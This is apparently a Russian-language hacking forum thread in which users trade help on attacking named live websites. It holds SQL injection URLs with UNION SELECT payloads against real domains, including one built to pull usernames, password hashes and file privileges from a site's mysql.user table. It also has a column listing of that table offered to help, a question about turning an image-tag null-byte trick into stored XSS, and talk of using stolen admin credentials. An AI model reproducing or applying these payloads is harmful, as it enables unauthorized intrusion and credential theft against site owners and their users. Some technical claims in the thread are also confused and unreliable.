Ваши вопросы по уязвимостям.

Похоже на DES.

 

хм, а разве знаки не различные должны быть в DES?

 

http://www.yvec.com/innerpage.php?cat_id=-3+union+select+1/*
неподбор

 

sabe, там 2 запроса с разным кол-вом колумнов

 

нашол на одном форуме ипб
в тег если прописать
[ img]http://site.com/folder/script%00.jpg[ /img]
то адрес картинки получается в подписи http://site.com/folder/script
можно из этого сделать активную xss?

 

Помогите! Это инъекция???


http://dom2.ru/heroes/1697'

 

нет

 

А что это тогда????

 

И как ею можно воспользоваться?

 

Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?

 

скажите пожалуйсто а рейтинг в контакте имеет уязвимости???

 

MatriX30000 попробуй кавычку подставить

 

Почитай статьи про уязвимости а потом задавай вопросы !!!

 

А как тогда она выводится???

 

Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:

правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)

есть еще вот такое срамотный сайт:

вот во 2-м случае я не понял: кто такой andy? и как бы мне найти логин/пароль как из 1-го случая....

 

Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг.

Code:

mysql> select column_name from information_schema.columns where table_name='mysql.user';
+-----------------------+
| column_name           |
+-----------------------+
| Host                  |
| User                  |
| Password              |
| Select_priv           |
| Insert_priv           |
| Update_priv           |
| Delete_priv           |
| Create_priv           |
| Drop_priv             |
| Reload_priv           |
| Shutdown_priv         |
| Process_priv          |
| File_priv             |
| Grant_priv            |
| References_priv       |
| Index_priv            |
| Alter_priv            |
| Show_db_priv          |
| Super_priv            |
| Create_tmp_table_priv |
| Lock_tables_priv      |
| Execute_priv          |
| Repl_slave_priv       |
| Repl_client_priv      |
| Create_view_priv      |
| Show_view_priv        |
| Create_routine_priv   |
| Alter_routine_priv    |
| Create_user_priv      |
| ssl_type              |
| ssl_cipher            |
| x509_issuer           |
| x509_subject          |
| max_questions         |
| max_updates           |
| max_connections       |
| max_user_connections  |
+-----------------------+
37 rows in set

 

а ты уверен что off-docnescott - это админ?

поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,password,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*

 

$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.

 

http://dom2.ru/magazine/numbers/1308392'

а вот это?

 

это тоже самое